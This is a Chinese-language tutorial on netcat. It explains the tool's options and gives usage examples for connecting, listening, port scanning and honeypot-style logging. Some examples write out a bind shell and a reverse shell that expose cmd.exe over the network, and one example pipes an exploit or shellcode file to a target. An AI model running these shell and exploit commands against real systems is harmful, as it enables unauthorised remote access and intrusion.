netcat的說明及使用

netcat被譽爲網絡安全界的‘瑞士軍刀’,相信沒有什麼人不認識它吧......
一個簡單而有用的工具,透過使用TCP或UDP協議的網絡連接去讀寫數據。它被設計成一個穩定的後門工具,
能夠直接由其它程序和腳本輕鬆驅動。同時,它也是一個功能強大的網絡調試和探測工具,能夠建立你需要的幾
乎所有類型的網絡連接,還有幾個很有意思的內置功能(詳情請看下面的使用方法)。

在中國,它的WINDOWS版有兩個版本,一個是原創者Chris Wysopal寫的原版本,另一個是由‘紅與黑’編譯
後的新‘濃縮’版。‘濃縮’版的主程序只有10多KB(10多KB的NC是不能完成下面所說的第4、第5種使用方法,
有此功能的原版NC好象要60KB:P),雖然“體積”小,但很完成很多工作。
=====================================================================================================
軟件介紹:

工具名:Netcat
作者:Hobbit && Chris Wysopal
網址:http://www.atstake.com/research/tools/network_utilities/
類別:開放源碼
平臺:Linux/BSD/Unix/Windows
WINDOWS下版本號:[v1.10 NT]

=====================================================================================================
參數介紹:

nc.exe -h即可看到各參數的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]

-d 後臺模式
-e prog 程序重定向,一旦連接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時的間隔
-l 監聽模式,用於入站連接
-L 連接關閉後,仍然繼續監聽
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 隨機本地及遠程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 詳細輸出--用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉--用於掃描時

端口的表示方法可寫爲M-N的範圍格式。


=====================================================================================================
基本用法:

大概有以下幾種用法:

1)連接到REMOTE主機,例子:
格式:nc -nvv 192.168.x.x 80
講解:連到192.168.x.x的TCP80端口


2)監聽LOCAL主機,例子:
格式:nc -l -p 80
講解:監聽本機的TCP80端口


3)掃描遠程主機,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
講解:掃描192.168.x.x的TCP80到TCP445的所有端口


4)REMOTE主機綁定SHELL,例子:
格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
講解:綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354端口


5)REMOTE主機綁定SHELL並反向連接,例子:
格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
講解:綁定REMOTE主機的CMDSHELL並反向連接到192.168.x.x的TCP5354端口


以上爲最基本的幾種用法(其實NC的用法還有很多,
當配合管道命令“|”與重定向命令“<”、“>”等等命令功能更強大......)。

=====================================================================================================
高級用法:

6)作攻擊程序用,例子:
格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt
講解:連接到192.168.x.x的80端口,並在其管道中發送c:exploit.txt的內容(兩種格式確有相同的效果,
真是有異曲同工之妙:P)

附:c:exploit.txt爲shellcode等


7)作蜜罐用[1],例子:
格式:nc -L -p 80
講解:使用-L(注意L是大寫)可以不停地監聽某一個端口,直到ctrl+c爲止


8)作蜜罐用[2],例子:
格式:nc -L -p 80 > c:log.txt
講解:使用-L可以不停地監聽某一個端口,直到ctrl+c爲止,同時把結果輸出到c:log.txt中,如果把‘>’
改爲‘>>’即可以追加日誌

附:c:log.txt爲日誌等


9)作蜜罐用[3],例子:
格式1:nc -L -p 80 < c:honeypot.txt
格式2:type.exe c:honeypot.txt|nc -L -p 80
講解:使用-L可以不停地監聽某一個端口,直到ctrl+c爲止,並把c:honeypot.txt的內容‘送’入其
管道中

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章